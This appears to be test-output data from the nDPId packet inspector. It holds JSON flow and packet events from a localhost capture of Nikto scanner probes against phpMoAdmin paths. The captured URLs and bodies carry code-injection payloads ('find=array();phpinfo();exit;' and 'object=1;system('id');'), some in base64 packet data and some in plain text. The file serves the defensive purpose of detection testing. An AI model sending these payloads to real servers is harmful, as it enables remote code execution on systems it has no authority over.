+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1576420277977,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277977,"pkt":"AAAAAAAAAAAAAAAACABFAAFqZD5AAEAG101\/AAABfwAAAcfWH5DMOF1rGOgpBIAYAED\/XgAAAQEICp1nAAGdZwABR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1576420277980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277980,"pkt":"AAAAAAAAAAAAAAAACABFAAFqHXJAAEAGHhp\/AAABfwAAAcfYH5AZXiQoPHeXDoAYAED\/XgAAAQEICp1nAASdZwAER0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1576420277981,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277981,"pkt":"AAAAAAAAAAAAAAAACABFAAFn7phAAEAGTPZ\/AAABfwAAAcfaH5CzPtfCPnznp4AYAED\/WwAAAQEICp1nAAWdZwAFR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1576420277983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277983,"pkt":"AAAAAAAAAAAAAAAACABFAAFcKzdAAEAGEGN\/AAABfwAAAcfcH5CIchJjnARiwIAYAED\/UAAAAQEICp1nAAedZwAHR0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} +01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1576420277984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277984,"pkt":"AAAAAAAAAAAAAAAACABFAAFfNJZAAEAGBwF\/AAABfwAAAcfeH5DptA3NjIJEK4AYAED\/UwAAAQEICp1nAAidZwAIR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} +01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1576420277986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277986,"pkt":"AAAAAAAAAAAAAAAACABFAAFn4zdAAEAGWFd\/AAABfwAAAcfgH5C+u9puvhX1U4AYAED\/WwAAAQEICp1nAAqdZwAKR0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1576420277988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277988,"pkt":"AAAAAAAAAAAAAAAACABFAAFqP5xAAEAG++9\/AAABfwAAAcfiH5DrbgbETTZEsIAYAED\/XgAAAQEICp1nAAudZwALR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1576420277989,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277989,"pkt":"AAAAAAAAAAAAAAAACABFAAFn5zlAAEAGVFV\/AAABfwAAAcfkH5BgZN5vdwnWyoAYAED\/WwAAAQEICp1nAA2dZwANR0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1576420277991,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277991,"pkt":"AAAAAAAAAAAAAAAACABFAAFq2t9AAEAGYKx\/AAABfwAAAcfmH5C2ZOOFxq2Ns4AYAED\/XgAAAQEICp1nAA6dZwAOR0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 